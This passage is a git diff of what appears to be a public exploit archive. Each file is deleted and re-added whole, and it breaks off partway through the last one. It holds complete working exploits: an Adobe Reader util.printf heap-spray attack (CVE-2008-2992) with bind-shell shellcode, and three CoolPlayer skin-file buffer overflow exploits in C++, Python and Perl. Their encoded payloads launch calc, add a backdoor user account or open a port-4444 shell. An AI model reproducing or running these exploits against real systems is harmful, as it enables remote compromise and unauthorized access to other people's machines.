12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888 -util.printf("%45000f",num); - -# milw0rm.com [2008-11-05] +Adobe Reader Javascript Printf Buffer Overflow Exploit +=========================================================== +Reference: http://www.coresecurity.com/content/adobe-reader-buffer-overflow +CVE-2008-2992 + +Thanks to coresecurity for the technical background. + +6Nov,2008: Exploit released by me + +Credits: Debasis Mohanty +www.hackingspirits.com +www.coffeeandsecurity.com +=========================================================== + +//Exploit by Debasis Mohanty (aka nopsledge/Tr0y) +//www.coffeeandsecurity +//www.hackingspirits.com + + +// win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com + +var payload = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a%u3058%u3142%u4150%u6b42%u4141%u4153%u4132%u3241%u4142%u4230%u5841%u3850%u4241%u7875%u4b69%u724c%u584a%u526b%u4a6d%u4a48%u6b59%u6b4f%u694f%u416f%u4e70%u526b%u744c%u4164%u6e34%u376b%u5535%u4c6c%u714b%u646c%u6145%u7468%u6a41%u6e4f%u626b%u326f%u6c38%u334b%u376f%u5550%u7851%u316b%u6c59%u504b%u6e34%u466b%u6861%u456e%u6f61%u6c30%u6c59%u6b6c%u3934%u4150%u3764%u6877%u6941%u565a%u636d%u4b31%u7872%u6c6b%u7534%u566b%u3134%u5734%u5458%u6b35%u6e55%u336b%u556f%u7474%u7841%u416b%u4c76%u464b%u626c%u6e6b%u416b%u354f%u564c%u6861%u666b%u3663%u6c4c%u6b4b%u7239%u444c%u5764%u616c%u4f71%u4733%u6b41%u336b%u4c54%u634b%u7073%u6c30%u534b%u6470%u6c4c%u724b%u4550%u4e4c%u6c4d%u374b%u7530%u7358%u426e%u4c48%u524e%u466e%u586e%u566c%u3930%u586f%u7156%u4676%u7233%u6346%u3058%u7033%u3332%u5458%u5237%u4553%u5162%u504f%u4b54%u5a4f%u3370%u6a58%u686b%u596d%u456c%u466b%u4930%u596f%u7346%u4e6f%u5869%u7365%u4d56%u5851%u366d%u6468%u7242%u7275%u674a%u5972%u6e6f%u7230%u4a48%u5679%u6b69%u6e45%u764d%u6b37%u584f%u3356%u3063%u5053%u7653%u7033%u3353%u5373%u3763%u5633%u6b33%u5a4f%u3270%u5046%u3568%u7141%u304c%u3366%u6c63%u6d49%u6a31%u7035%u6e68%u3544%u524a%u4b50%u7177%u4b47%u4e4f%u3036%u526a%u3130%u7041%u5955%u6e6f%u3030%u6c68%u4c64%u546d%u796e%u3179%u5947%u596f%u4646%u6633%u6b35%u584f%u6350%u4b58%u7355%u4c79%u4146%u6359%u4b67%u784f%u7656%u5330%u4164%u3344%u7965%u4e6f%u4e30%u7173%u5878%u6167%u6969%u7156%u6269%u3977%u6a6f%u5176%u4945%u4e6f%u5130%u5376%u715a%u7274%u6246%u3048%u3063%u6c6d%u5a49%u6345%u625a%u7670%u3139%u5839%u4e4c%u4d69%u5337%u335a%u4e74%u4b69%u5652%u4b51%u6c70%u6f33%u495a%u336e%u4472%u6b6d%u374e%u7632%u6e4c%u6c73%u704d%u767a%u6c58%u4e6b%u4c4b%u736b%u5358%u7942%u6d6e%u7463%u6b56%u304f%u7075%u4b44%u794f%u5346%u706b%u7057%u7152%u5041%u4251%u4171%u337a%u4231%u4171%u5141%u6645%u6931%u5a6f%u5070%u6e68%u5a4d%u5679%u6865%u334e%u3963%u586f%u6356%u4b5a%u4b4f%u704f%u4b37%u4a4f%u4c70%u614b%u6b47%u4d4c%u6b53%u3174%u4974%u596f%u7046%u5952%u4e6f%u6330%u6c58%u6f30%u577a%u6174%u324f%u4b73%u684f%u3956%u386f%u4350"); + +//Heap Spray starts here - Kiddos don't mess up with this +var nop =""; +for (iCnt=128;iCnt>=0;--iCnt) nop += unescape("%u9090%u9090%u9090%u9090%u9090"); +heapblock = nop + payload; +bigblock = unescape("%u9090%u9090"); +headersize = 20; +spray = headersize+heapblock.length +while (bigblock.length<spray) bigblock+=bigblock; +fillblock = bigblock.substring(0, spray); +block = bigblock.substring(0, bigblock.length-spray); +while(block.length+spray < 0x40000) block = block+block+fillblock; +mem = new Array(); +for (i=0;i<1400;i++) mem[i] = block + heapblock; + +// reference snippet from core security +// http://www.coresecurity.com/content/adobe-reader-buffer-overflow +var num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888 +util.printf("%45000f",num); + +# milw0rm.com [2008-11-05] diff --git a/platforms/windows/local/7536.cpp b/platforms/windows/local/7536.cpp index c7a170e5d..ace1a672f 100755 --- a/platforms/windows/local/7536.cpp +++ b/platforms/windows/local/7536.cpp @@ -1,75 +1,75 @@ -/* -* CoolPlayer 2.19 (Skin File) Local Buffer Overflow Exploit -* -* Advisory: http://www.bmgsec.com.au/advisory/43/ -* Test box: WinXP Pro SP2 English -* -* Code reference is in skin.c, lines 464 - 480 -* -* Written and discovered by: -* r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au) -*/ - -#include <iostream> -#include <fstream> -#include <cstdlib> //exit - -using namespace std; - -int main() -{ - //win32_exec - EXITFUNC=process CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com - //Bad characters: 0x00, 0x0d, 0xf4 - char scode[] = - "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" - "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" - "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" - "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" - "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44" - "\x42\x30\x42\x50\x42\x30\x4b\x58\x45\x34\x4e\x53\x4b\x38\x4e\x57" - "\x45\x50\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x31\x4b\x38" - "\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x34\x4b\x48\x46\x33\x4b\x48" - "\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c" - "\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e" - "\x46\x4f\x4b\x53\x46\x35\x46\x42\x46\x30\x45\x57\x45\x4e\x4b\x38" - "\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x38\x4e\x30\x4b\x54" - "\x4b\x38\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x58" - "\x41\x30\x4b\x4e\x49\x48\x4e\x55\x46\x42\x46\x50\x43\x4c\x41\x43" - "\x42\x4c\x46\x36\x4b\x48\x42\x44\x42\x33\x45\x58\x42\x4c\x4a\x47" - "\x4e\x50\x4b\x48\x42\x34\x4e\x30\x4b\x38\x42\x47\x4e\x31\x4d\x4a" - "\x4b\x48\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x58\x42\x4b" - "\x42\x50\x42\x50\x42\x30\x4b\x38\x4a\x36\x4e\x53\x4f\x35\x41\x53" - "\x48\x4f\x42\x46\x48\x45\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x57" - "\x42\x45\x4a\x46\x50\x47\x4a\x4d\x44\x4e\x43\x37\x4a\x46\x4a\x39" - "\x50\x4f\x4c\x48\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x46" - "\x4e\x36\x43\x46\x50\x32\x45\x46\x4a\x37\x45\x46\x42\x30\x5a"; - - char buffer[1918]; - char eip[] = "\x27\x38\x03\x7d"; //jmp esp - - cout << "[*] Generating payload\n"; - strcpy(buffer, "[CoolPlayer Skin]\nPlaylistSkin="); - - int i; - for (i=0; i<1534; i++) - buffer[31+i] = 'A'; - - for (i=0; i<sizeof(eip); i++) - buffer[1565+i] = eip[i]; - - for (i=0; i<sizeof(scode); i++) - buffer[1569+i] = scode[i]; - - ofstream outStream; - outStream.open("cp.ini"); - - outStream << buffer; - - outStream.close(); - - cout << "[+] Skin file created.\n"; - - return 0; -} - -// milw0rm.com [2008-12-21] +/* +* CoolPlayer 2.19 (Skin File) Local Buffer Overflow Exploit +* +* Advisory: http://www.bmgsec.com.au/advisory/43/ +* Test box: WinXP Pro SP2 English +* +* Code reference is in skin.c, lines 464 - 480 +* +* Written and discovered by: +* r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au) +*/ + +#include <iostream> +#include <fstream> +#include <cstdlib> //exit + +using namespace std; + +int main() +{ + //win32_exec - EXITFUNC=process CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com + //Bad characters: 0x00, 0x0d, 0xf4 + char scode[] = + "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" + "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" + "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" + "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" + "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44" + "\x42\x30\x42\x50\x42\x30\x4b\x58\x45\x34\x4e\x53\x4b\x38\x4e\x57" + "\x45\x50\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x31\x4b\x38" + "\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x34\x4b\x48\x46\x33\x4b\x48" + "\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c" + "\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e" + "\x46\x4f\x4b\x53\x46\x35\x46\x42\x46\x30\x45\x57\x45\x4e\x4b\x38" + "\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x38\x4e\x30\x4b\x54" + "\x4b\x38\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x58" + "\x41\x30\x4b\x4e\x49\x48\x4e\x55\x46\x42\x46\x50\x43\x4c\x41\x43" + "\x42\x4c\x46\x36\x4b\x48\x42\x44\x42\x33\x45\x58\x42\x4c\x4a\x47" + "\x4e\x50\x4b\x48\x42\x34\x4e\x30\x4b\x38\x42\x47\x4e\x31\x4d\x4a" + "\x4b\x48\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x58\x42\x4b" + "\x42\x50\x42\x50\x42\x30\x4b\x38\x4a\x36\x4e\x53\x4f\x35\x41\x53" + "\x48\x4f\x42\x46\x48\x45\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x57" + "\x42\x45\x4a\x46\x50\x47\x4a\x4d\x44\x4e\x43\x37\x4a\x46\x4a\x39" + "\x50\x4f\x4c\x48\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x46" + "\x4e\x36\x43\x46\x50\x32\x45\x46\x4a\x37\x45\x46\x42\x30\x5a"; + + char buffer[1918]; + char eip[] = "\x27\x38\x03\x7d"; //jmp esp + + cout << "[*] Generating payload\n"; + strcpy(buffer, "[CoolPlayer Skin]\nPlaylistSkin="); + + int i; + for (i=0; i<1534; i++) + buffer[31+i] = 'A'; + + for (i=0; i<sizeof(eip); i++) + buffer[1565+i] = eip[i]; + + for (i=0; i<sizeof(scode); i++) + buffer[1569+i] = scode[i]; + + ofstream outStream; + outStream.open("cp.ini"); + + outStream << buffer; + + outStream.close(); + + cout << "[+] Skin file created.\n"; + + return 0; +} + +// milw0rm.com [2008-12-21] diff --git a/platforms/windows/local/7547.py b/platforms/windows/local/7547.py index 6e233683a..13464c96a 100755 --- a/platforms/windows/local/7547.py +++ b/platforms/windows/local/7547.py @@ -1,64 +1,64 @@ -# CoolPlayer (Skin) Buffer Overflow -# maybe all versions are affected :) -# By:Encrypt3d.M!nd -# -# Orginal Exploit: by r0ut3r -# http://www.milw0rm.com/exploits/7536 -# -# i've test it on my box(winxp sp3) and didn't work -# so i've re-wrote the exploit and this is workin -# tested: Windows xp sp3 patched -# version tested:2.17,2.18,2.19 -# -# Greetz:-=Mizo=-,L!0n,El Mariachi,MiNi SpIder,GGy,and all my friends -################################################### - -chars = "A"*1511 - -eip = "\x6B\x8C\x49\x7E" #user32.dll jmp esp - -header = "[CoolPlayer Skin]\nPlaylistSkin=" - - -# win32_adduser - PASS=t35t EXITFUNC=seh USER=t35t Size=489 -Encoder=PexAlphaNum http://metasploit.com -shellcode = ( -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34" -"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x57" -"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x31\x4b\x38" -"\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x38" -"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c" -"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" -"\x46\x4f\x4b\x33\x46\x45\x46\x52\x46\x50\x45\x47\x45\x4e\x4b\x58" -"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x34" -"\x4b\x58\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58" -"\x41\x50\x4b\x4e\x49\x48\x4e\x55\x46\x32\x46\x50\x43\x4c\x41\x43" -"\x42\x4c\x46\x56\x4b\x58\x42\x54\x42\x43\x45\x38\x42\x4c\x4a\x37" -"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x38\x42\x37\x4e\x41\x4d\x4a" -"\x4b\x58\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b" -"\x42\x50\x42\x50\x42\x30\x4b\x48\x4a\x46\x4e\x33\x4f\x35\x41\x33" -"\x48\x4f\x42\x56\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x47" -"\x42\x35\x4a\x36\x42\x4f\x4c\x48\x46\x30\x4f\x55\x4a\x36\x4a\x49" -"\x50\x4f\x4c\x48\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x46\x4d\x46" -"\x46\x36\x50\x42\x45\x36\x4a\x37\x45\x56\x42\x52\x4f\x42\x43\x56" -"\x42\x42\x50\x36\x45\x46\x46\x57\x42\x52\x45\x47\x43\x47\x45\x46" -"\x44\x37\x42\x32\x46\x47\x43\x43\x45\x43\x46\x57\x42\x52\x46\x47" -"\x43\x43\x45\x33\x46\x47\x42\x42\x4f\x32\x41\x34\x46\x54\x46\x54" -"\x42\x52\x48\x42\x48\x32\x42\x42\x50\x46\x45\x36\x46\x57\x42\x32" -"\x4e\x36\x4f\x56\x43\x46\x41\x36\x4e\x36\x47\x56\x44\x37\x4f\x36" -"\x45\x37\x42\x37\x42\x32\x41\x44\x46\x46\x4d\x56\x49\x56\x50\x56" -"\x49\x46\x43\x57\x46\x57\x44\x57\x41\x56\x46\x37\x4f\x46\x44\x37" -"\x43\x57\x42\x42\x46\x37\x43\x33\x45\x53\x46\x47\x42\x52\x4f\x52" -"\x41\x54\x46\x34\x46\x34\x42\x50\x5a"); - -poc = (header+chars+eip+"\x90"*10+shellcode) - -file = open('skin.ini','w+') -file.write(poc) -file.close() - -# milw0rm.com [2008-12-22] +# CoolPlayer (Skin) Buffer Overflow +# maybe all versions are affected :) +# By:Encrypt3d.M!nd +# +# Orginal Exploit: by r0ut3r +# http://www.milw0rm.com/exploits/7536 +# +# i've test it on my box(winxp sp3) and didn't work +# so i've re-wrote the exploit and this is workin +# tested: Windows xp sp3 patched +# version tested:2.17,2.18,2.19 +# +# Greetz:-=Mizo=-,L!0n,El Mariachi,MiNi SpIder,GGy,and all my friends +################################################### + +chars = "A"*1511 + +eip = "\x6B\x8C\x49\x7E" #user32.dll jmp esp + +header = "[CoolPlayer Skin]\nPlaylistSkin=" + + +# win32_adduser - PASS=t35t EXITFUNC=seh USER=t35t Size=489 +Encoder=PexAlphaNum http://metasploit.com +shellcode = ( +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34" +"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x57" +"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x31\x4b\x38" +"\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x38" +"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c" +"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" +"\x46\x4f\x4b\x33\x46\x45\x46\x52\x46\x50\x45\x47\x45\x4e\x4b\x58" +"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x34" +"\x4b\x58\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58" +"\x41\x50\x4b\x4e\x49\x48\x4e\x55\x46\x32\x46\x50\x43\x4c\x41\x43" +"\x42\x4c\x46\x56\x4b\x58\x42\x54\x42\x43\x45\x38\x42\x4c\x4a\x37" +"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x38\x42\x37\x4e\x41\x4d\x4a" +"\x4b\x58\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b" +"\x42\x50\x42\x50\x42\x30\x4b\x48\x4a\x46\x4e\x33\x4f\x35\x41\x33" +"\x48\x4f\x42\x56\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x47" +"\x42\x35\x4a\x36\x42\x4f\x4c\x48\x46\x30\x4f\x55\x4a\x36\x4a\x49" +"\x50\x4f\x4c\x48\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x46\x4d\x46" +"\x46\x36\x50\x42\x45\x36\x4a\x37\x45\x56\x42\x52\x4f\x42\x43\x56" +"\x42\x42\x50\x36\x45\x46\x46\x57\x42\x52\x45\x47\x43\x47\x45\x46" +"\x44\x37\x42\x32\x46\x47\x43\x43\x45\x43\x46\x57\x42\x52\x46\x47" +"\x43\x43\x45\x33\x46\x47\x42\x42\x4f\x32\x41\x34\x46\x54\x46\x54" +"\x42\x52\x48\x42\x48\x32\x42\x42\x50\x46\x45\x36\x46\x57\x42\x32" +"\x4e\x36\x4f\x56\x43\x46\x41\x36\x4e\x36\x47\x56\x44\x37\x4f\x36" +"\x45\x37\x42\x37\x42\x32\x41\x44\x46\x46\x4d\x56\x49\x56\x50\x56" +"\x49\x46\x43\x57\x46\x57\x44\x57\x41\x56\x46\x37\x4f\x46\x44\x37" +"\x43\x57\x42\x42\x46\x37\x43\x33\x45\x53\x46\x47\x42\x52\x4f\x52" +"\x41\x54\x46\x34\x46\x34\x42\x50\x5a"); + +poc = (header+chars+eip+"\x90"*10+shellcode) + +file = open('skin.ini','w+') +file.write(poc) +file.close() + +# milw0rm.com [2008-12-22] diff --git a/platforms/windows/local/7692.pl b/platforms/windows/local/7692.pl index f27ac0358..6bf5576d6 100755 --- a/platforms/windows/local/7692.pl +++ b/platforms/windows/local/7692.pl @@ -1,95 +1,95 @@ -#!/usr/bin/perl -# coolplayer_bof.pl -# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com] -# -# CoolPlayer BUILD 219 'PlaylistSkin' Buffer Overflow Exploit -# http://coolplayer.sourceforge.net -# -# TCP 0.0.0.0:4444 0.0.0.0:0 LISTENING -# -# C:\Documents and Settings\Administrator> telnet localhost 4444 -# ..... -# Microsoft Windows 2000 [Version 5.00.2195] -# (C) Copyright 1985-2000 Microsoft Corp. -# -# ANDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD -# -# Microsoft Windows XP [Version 5.1.2600] -# (C) Copyright 1985-2001 Microsoft Corp. -# -# Some fun, good 'ole win32 smashing.. bada-bing bada-boom! - -$header = "[CoolPlayer Skin]\nPlaylistSkin="; - -$win2ksp4 = 0x77E4307B; # user32.dll JMP ESP -$winxpsp3 = 0x7E498C6B; # user32.dll JMP ESP - - # Win32 Portbind Shellcode (pexalphanum/metasploit,port=4444) -$shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" . - "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" . - "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" . - "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" . - "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e" . - "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48" . - "\x4e\x46\x46\x32\x46\x42\x4b\x48\x45\x54\x4e\x33\x4b\x38\x4e\x37" . - "\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x41\x4b\x48" . - "\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x58\x46\x43\x4b\x58" . - "\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" . - "\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" . - "\x46\x4f\x4b\x53\x46\x55\x46\x32\x4a\x32\x45\x37\x45\x4e\x4b\x48" . - "\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54" . - "\x4b\x58\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x32\x4b\x38" . - "\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x56\x43\x4c\x41\x53\x4b\x4d" . - "\x46\x46\x4b\x58\x43\x44\x42\x33\x4b\x38\x42\x54\x4e\x30\x4b\x48" . - "\x42\x47\x4e\x51\x4d\x4a\x4b\x48\x42\x34\x4a\x50\x50\x35\x4a\x36" . - "\x50\x38\x50\x54\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56" . - "\x43\x55\x48\x56\x4a\x46\x43\x53\x44\x43\x4a\x36\x47\x57\x43\x57" . - "\x44\x33\x4f\x35\x46\x55\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e" . - "\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x38\x45\x4e" . - "\x48\x56\x41\x38\x4d\x4e\x4a\x50\x44\x30\x45\x45\x4c\x46\x44\x30" . - "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x55" . - "\x4f\x4f\x48\x4d\x43\x55\x43\x55\x43\x55\x43\x55\x43\x45\x43\x44" . - "\x43\x35\x43\x54\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x46\x41\x31" . - "\x4e\x55\x48\x46\x43\x55\x49\x58\x41\x4e\x45\x59\x4a\x56\x46\x4a" . - "\x4c\x51\x42\x37\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x51" . - "\x41\x35\x45\x45\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32" . - "\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x35\x4f\x4f\x42\x4d" . - "\x4a\x56\x45\x4e\x49\x34\x48\x48\x49\x44\x47\x45\x4f\x4f\x48\x4d" . - "\x42\x55\x46\x55\x46\x35\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x46" . - "\x47\x4e\x49\x57\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45" . - "\x4f\x4f\x42\x4d\x48\x56\x4c\x56\x46\x56\x48\x46\x4a\x46\x43\x56" . - "\x4d\x36\x49\x58\x45\x4e\x4c\x56\x42\x45\x49\x45\x49\x42\x4e\x4c" . - "\x49\x38\x47\x4e\x4c\x36\x46\x44\x49\x38\x44\x4e\x41\x33\x42\x4c" . - "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x44\x4e\x32" . - "\x43\x39\x4d\x38\x4c\x37\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46" . - "\x44\x57\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x44\x4f\x4f" . - "\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x55\x41\x55\x41\x35\x4c\x56" . - "\x41\x50\x41\x55\x41\x45\x45\x35\x41\x45\x4f\x4f\x42\x4d\x4a\x56" . - "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x36" . - "\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f" . - "\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d" . - "\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x43\x35\x4f\x4f\x48\x4d" . - "\x4f\x4f\x42\x4d\x5a"; - -$filename = $ARGV[0]; -$target = $ARGV[1]; - -if(!defined($filename) || !defined($target)) -{ - - print "Usage: $0 <filename.ini> [1=win2ksp4/2=winxpsp3]\n"; - -} - -if($target == "1") { $retaddr = pack('l', $win2ksp4); } -if($target == "2") { $retaddr = pack('l', $winxpsp3); } - -$payload = $header . $retaddr x 377 . $shellcode; # 377 * 4 = 1508 - - open(FILE, '>' . $filename); - print FILE $payload; - close(FILE); - -exit; - -# milw0rm.com [2009-01-07] +#!/usr/bin/perl +# coolplayer_bof.pl +# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com] +# +# CoolPlayer BUILD 219 'PlaylistSkin' Buffer Overflow Exploit +# http://coolplayer.sourceforge.net +# +# TCP 0.0.0.0:4444 0.0.0.0:0 LISTENING +# +# C:\Documents and Settings\Administrator> telnet localhost 4444 +# ..... +# Microsoft Windows 2000 [Version 5.00.2195] +# (C) Copyright 1985-2000 Microsoft Corp. +# +# ANDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD +# +# Microsoft Windows XP [Version 5.1.2600] +# (C) Copyright 1985-2001 Microsoft Corp. +# +# Some fun, good 'ole win32 smashing.. bada-bing bada-boom! + +$header = "[CoolPlayer Skin]\nPlaylistSkin="; + +$win2ksp4 = 0x77E4307B; # user32.dll JMP ESP +$winxpsp3 = 0x7E498C6B; # user32.dll JMP ESP + + # Win32 Portbind Shellcode (pexalphanum/metasploit,port=4444) +$shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" . + "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" . + "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" . + "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" . + "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e" . + "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48" . + "\x4e\x46\x46\x32\x46\x42\x4b\x48\x45\x54\x4e\x33\x4b\x38\x4e\x37" . + "\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x41\x4b\x48" . + "\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x58\x46\x43\x4b\x58" . + "\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" . + "\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" . + 